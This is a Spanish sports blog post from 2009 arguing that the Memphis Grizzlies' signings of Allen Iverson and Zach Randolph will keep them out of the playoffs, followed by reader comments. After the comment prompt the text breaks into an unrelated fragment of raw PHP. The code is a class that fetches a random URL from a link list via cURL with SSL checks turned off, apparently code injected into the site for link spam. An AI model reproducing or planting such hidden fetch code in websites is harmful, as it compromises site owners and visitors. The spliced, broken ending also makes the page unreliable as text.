Memphis Grizzlies 2009-2010: No me chilles que no te veo

28 de September de 2009 por Viva_Dirk

ai3grizzCuando el año pasado hice un análisis moderadamente optimista de Memphis, lo hacía pensando en que no se puede dirigir tan mal una franquicia durante tanto tiempo. Al parecer estaba completamente equivocado. Las buenas sensaciones que dejaron en su año rookie OJ Mayo y Marc Gasol poco importan ahora mismo viendo las incorporaciones que ha hecho el señor Wallace.

Todos los que vieron jugar a los ositos el año pasado pensaron que hacían falta jugadores veteranos, con un conocimiento del juego mas allá de salir en el Top-10 de la semana o de anotar 30 puntos, jugadores como Andre Miller o Hedo Turkoglu, que han estado en el mercado este verano y que han fichado por equipos mejor dirigidos que Memphis.

En su lugar ha llegado como agente libre Allen Iverson, que es lo opuesto a lo que necesitaba este grupo de jugadores jóvenes. Iverson se negó la pasada campaña a desempeñar un papel secundario en Detroit y este verano ha vuelto a negarse a varias cosas que le pedían los diversos equipos que se han interesado por él. Cosas como bajar sus pretensiones económicas, reducir su número de minutos o salir desde el banquillo no entraban en los planes de The Answer, aunque haga tiempo que no es la respuesta a ninguna pregunta.

randolphgrizzPara llenar el vestuario con buena armonía ha llegado vía traspaso Zach Randolph, tan buen anotador como polémico dentro y fuera de la pista. Se trata de un jugador que se ha peleado con varios compañeros, se ha visto envuelto en tiroteos y polémicas diversas y, a la vez, a lo largo de su carrera promedia más pérdidas que la suma de asistencias y tapones.

El panorama no puede presentarse peor para los jóvenes que antes tenían todo el protagonismo del mundo y ahora se van a ver eclipsados por dos jugadores egoístas que no tienen otra intención en Memphis que hacer sus números y llenar el bolsillo. Mike Conley va a ver reducidos sus minutos, OJ Mayo va a ver cuestionado su liderazgo, Rudy Gay no va a compartir más el balón y Marc Gasol va a tener que buscarse un buen letrero de neón para que le llegue algún balón en condiciones.

En el draft se decantaron por el center tanzano Hasheem Thabeet, el cual no parece que vaya a tener excesivos minutos -que es, sin duda, lo que necesita-. Con una movilidad de alero, el pívot de 2.21 llega con el cartel de gran intimidador y baluarte defensivo de UConn. Ofensivamente tiene movimientos limitados en el poste y nula capacidad para el uno contra uno en estático. Habrá que ver cómo se gestionan sus minutos.warrickmarconleymayogay

Desde luego podríamos estar haciendo una lectura completamente equivocada de la situación, Iverson podría ejercer de base a muy buen nivel dejando de pensar en sus tiros y Zach, en una ciudad tan fría como Memphis, podría dedicarse sólo a jugar. En este caso Memphis sería indiscutiblemente mucho mejor equipo que el año pasado. Pero lo cierto es que no conozco a nadie que sea de esa opinión.

Quinteto inicial: Allen Iverson, OJ, Mayo, Rudy Gay, Zach Randolph y Marc Gasol

Sexto hombre: Mike Conley

Pronóstico: (Muy) fuera de Playoffs

Comenta

17 comentarios a esta entrada

  1. M dice:
    #1

    Tengo entendido que Iverson pasa de cobrar 21 millones de dolares a 3’5, pero igual patino. Curiosos, estos grizzlies: los jugadores jóvenes parecen verlo como una etapa de transición en la que intentan lucirse personalmente para que otros equipos se fijen en ellos, y los más veteranos parecen considerarlo un semiretiro sin mucho stress. Entre una cosa y otra, parece difícil que se juegue a algo decente.

      Citar

  2. MagicJohnson32 dice:
    #2

    Al final Iverson firmó por 3 kilos justitos, creo que no llega a 3,5, y por un solo año. Tiene toda la pinta que no espera quedarse mucho tiempo en Tennessee, vaya.

      Citar

  3. kantonyo dice:
    #3

    Va a ser muy díficil confiar en esta plantilla. Como he dicho en alguna vez, es un equipo perfecto para jugar a la consola, para poder manejarlos a todos con un mando …

    Cierto es, que es un quinteto bastante compensado en talento, pero no en roles. No hay un conductor del juego claro, y más aún sino se le deja esta función a Conley. Y Va a ser dificil convencer tanto a Iverson, Gay, Mayo y Zach de que el baloncesto es un juego de equipo.

    Positivamente, creo que el juego interior, si se maneja bien, puede ser su mejor arma, Zach, Marc y Hasheem pueden complementarse bien. El año pasado me defraudó Darrell Arthur, y me cuesta creer que este año progrese. La incoporación de Sam Young no me dice nada en Memphis, teniendo lo que tiene por delante, al jugador le hubiera venido mejor cualquier franquicia.

    Discrepo un pelin con Viva_Dirk, ya que si las lesiones le respetan creo que Thabeet va a disponer de unos 20-25 minutos por partido como mínimo, no ya por su talento, ni por que sea mejor que Marc o Zach, sino por la apuesta de Chris Wallace de elegirle en el número 2 del Draft. Además es una apuesta que vale la pena, ya que si Hasheem funciona, todos sabemos que jugadores de este tipo influyen bastante para el crecimiento de una franquicia.

    En resumen, apuesto por 15-20 victorias en el peor de los casos y 30-35 en su mejor versión. Siempre fuera de playoffs.

      Citar

  4. pcerezo dice:
    #4

    Lo único salvable de ese equipo son OJ Mayo y Marc Gasol.

    Creo que Mayo va a hacer una gran carrera en la liga y Marc puede ser un buen center que complemente a un gran Powerforward.

    Lo demás creo que muy prescindible. Iverson ya no interesa a nadie (salvo a Lplus-X), Zach Randolph está de vuelta, Rudy Gay no ha evolucionado nada este año y da la sensación que este año menos todavía.

    Sinceramente a veces maldices por qué narices no hay descensos en la NBA…

    Un saludo,
    Pablo

      Citar

  5. Viva_Dirk dice:
    #5

    Kantonyo, yo también creo que va a jugar 20 minutitos, si no lo hace ya sería un acto de esquizofrenia jugarsela en el Nº2 y no ponerlo…..pero vaya, que son capaces de eso y mas.

      Citar

  6. L.Casei dice:
    #6

    Sobre Memphis y la llegada de Randolph y Iverson, ya lo hablábamos hace unos 10 días:
    Creo que es difícil que les salga bien la jugada, es una apuesta muy arriesgada, aunque lo bueno es que hay poco que perder y tienen que llevar a más gente al FedEx.
    Defensivamente parecen no muy fuertes y en ataque, hará falta definir roles porque si no, puede ser una feria. Yo creo que iverson sí va a tener buena actitud, aunque nunca se sabe con este crack.
    No tienen especialistas de tiro, y eso con el estilo que querrá imponer Hollins será un lastre, porque les dará menos opciones. Por supuesto que Mayo es un gran tirador, pero me refiero a especialistas o variedad en ataque.
    Pero es un equipo que hay que ver, como deciais.
    Iverson por cierto va a cobrar justo esos 3,5 millones $.

      Citar

  7. Asdare dice:
    #7

    En Memphis parece que quieren hacer las cosas mal, porque vamos a ver: si fichas a Turkoglu o Miller como bien decis aqui te pueden salir mal pero el fichaje en principio es bueno, pero fichar a Iverson y a Randolph es justo lo contrario, es arriesgarte por arriesgarte, fichar lo que nadie ha querido. Y con Thabeet lo mismo: generaba muchisimas dudas antes del draft y lo eligieron los ositos. En fin, al menos es un equipo que llama la atencion: igual les dura 5 dias, pero algo es algo.

    Por cierto: ¿nadie cree que a Marc este año le van a dar menos minutos? Fichar a Randolph y gastar tu nº2 del draft en un pivot no me parecen buenas señales, mas aun despues del mal eurobasket que ha hecho. Ademas, si alguien va a tener que jugar menos minutos el parece la opcion mas facil (obviamente no la mejor). En fin, que no le veo jugando los 30 minutos del año pasado.

    Para acabar, no conozco muy a fondo la plantilla de Memphis, pero si tienen un buen exterior este podria ser su año, porque Iverson-Mayo-Gay no va a funcionar ni de lejos. Quiza Conley, no se

      Citar

  8. Kiki dice:
    #8

    A pesar de Marc y el pasado de Pau , le he perdido cariño al equipo de Memphis. El mismo Pau y Marc con sus declaraciones en varias entrevistas han cuestionado la forma de trabajar de la dirección deportiva de los Grizzlies, con Wallace a la cabeza. y es que desde fuera no se comprenden muchas operaciones que hacen, parece que dan muchos palos de ciego, sin una idea clara: equipo joven?, en construcción?, transición… a dónde?. Comparto la opinión de que la decisión de trerse a dos gallos como Iverson y Randolph responde más a una idea empresarial o de márketing que a una apuesta deportiva real. Si siguen perdiendo espectadores, es una franquicia en peligro.
    Estoy con Kantonyo: creo que Thabeet será titular en detrimento de Marc. El cinco inicial puede ser Iverson-Mayo-Gay-Randolph-Thabeet. Un banco con Conley, Young (R), Carroll (R), Arthur y Gasol no parece que sea para tirar cohetes. Completan la plantilla Marcus Williams (ojalá explote), Jaric, Haddadi, Steven Hunter (y sus casi 3,7 mill. $…) y acaban de fichar a otro alero, Trey Gilder. ¿Quién es el escolta suplente de este equipo?
    Me parece un equipo que se queda en fuegos de artificio. Para colmo, han perdido a jugadores que hacían de Memphis un conjunto algo más serio, como Ross, Buckner y sobre todo Hakim Warrick. También se han ido Milicic, Mihm y Wilks, los dos últimos casi inéditos.
    Y lo que “nos” hicieron con lo de Darius Miles (baja también. por supuesto) es de traca. Ahora le toca a Portland computar los 9 mllones de su ficha para el tope salarial… menos mal que es el último año y nos olvidaremos de él.

      Citar

  9. TheDeerHunter dice:
    #9

    Sólo decir que lo de “No me chilles que no te veo” es un titular cojonudo en cuanto al contenido de tu análisis…
    De todas formas, que conste que yo no estoy tan de acuerdo con que los fichajes de Iverson y Zach vayan a ser los más grandes problemas de este equipo. Más bien son de lo poco que se ha hecho bien allí los últimos años.
    Ahora… que todavía hay quien le reprocha a Gasol no haber hecho de los Grizzlies un equipo campeón (¿eh Viva…?

      Citar

  10. Dantley2 dice:
    #10

    El titular lo resume de escándalo ¡¡¡

    Estoy de acuerdo con Kantonyo con lo de la consola, magnífica definición.

    También hay que ver el lado económico, estos equipos atraen público.

      Citar

  11. Viva_Dirk dice:
    #11

    Deer, ni yo ni nadie en su sano juicio le echa en cara a Gasol que no hiciera de Memphis un equipo campeón. De hecho yo creo que con todos los equipos que perdieron en play-offs era normal que perdieran, aunque si hubiese estado bien ganar algun partido, que se llevó un 12-0 perdiendo de casi 13 puntos de media.

    Ahora bien, si alguien quiere venderme que es mejor que Nowitzki, si creo que deberian haber pasado alguna ronda.

      Citar

  12. TheDeerHunter dice:
    #12

    Una cosa de la que me acabo de dar cuenta ahora (y parece mentira)

    Zach 16 kilos por temporada (y le quedan dos) ¿no es un contrato similar al que tenía Pau, del que se desprendieron por nada aduciendo motivos económicos?? ¿qué es lo que les ha pasado económicamente para cambiar así de opinión??… les ha tocado la lotería??
    ¿qué tipo de hierba fuma Wallace y quien se la vende?? ¿no tendrá una plantación entera en casa para él solito???
    (lógicamente retiro mi comentario de que lo de traer a Zach era de lo poco bien que se había hecho en Memphis)

      Citar

  13. Jabho dice:
    #13

    Hombre, mejoraran el año pasado, no es dificil, y al menos deberían dejar atrás a Sacramento, Thunders, MInny y Rockets…. poco más. Quizás con Warriors, Clippers y algún otro estarán en zona media baja. Atraeran público,…. no sé. no parece un proyecto serio, pero es que lo tenían dificil para atraer talento. Yo no lo hubiera hecho, pero entiendo el porqué lo han hecho. No entiendo algunas de las otras decisiones tomadas (el trade de Pau madre de Dios).

    Les veo en las 35 victorias

      Citar

  14. sabas dice:
    #14

    A mi 35 victorias me parecen demasiadas, a ver como se compenetran los jugadores pero veo mucho egoista. Estaban siempre con que Gasol era Blando y se traen a Randolph que dicen que un dia puso un tapon, eso si de casuaidad que el solo pasaba por alli.
    Y en cuanto a lo de atraer publico, sera si acaso los primeros partidos porque con ver a esta Iverson una vez creo que ya sobra, vamos que no es Michael Jordan.

      Citar

  15. Landrusski dice:
    #15

    Uffff yo a memphis los veo mal no…lo siguiente. Vaya movimientos que me hace chris “arakiri” wallace,,,supongo que como habeis comentado,van encaminados a atraer publico y vender camisetas de iverson…porque deportivamente estos grizzlies son sino el peor equipo el 2 peor jeje…yo lo unico que salvo de este equipo es oj mayo(me parece que va a ser un crack absoluto dentro de unos años) marc gasol(si el año pasao ya solto alguna en la prensa,este año no quiero ni pensar lo que dira…) y conley(que posiblemente le van a cortar la progresion….) si vemos a memphis es pa exar una quiniela a quien tira mas tiros en un partido y poco mas…

      Citar

  16. sergio dice:
    #16

    Randolph: 3 asistencias en 4 partidos de pretemporada….. ¬¬

      Citar

  17. Txusma dice:
    #17

    Q ganitas tengo de que juegue Iverson… jajaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>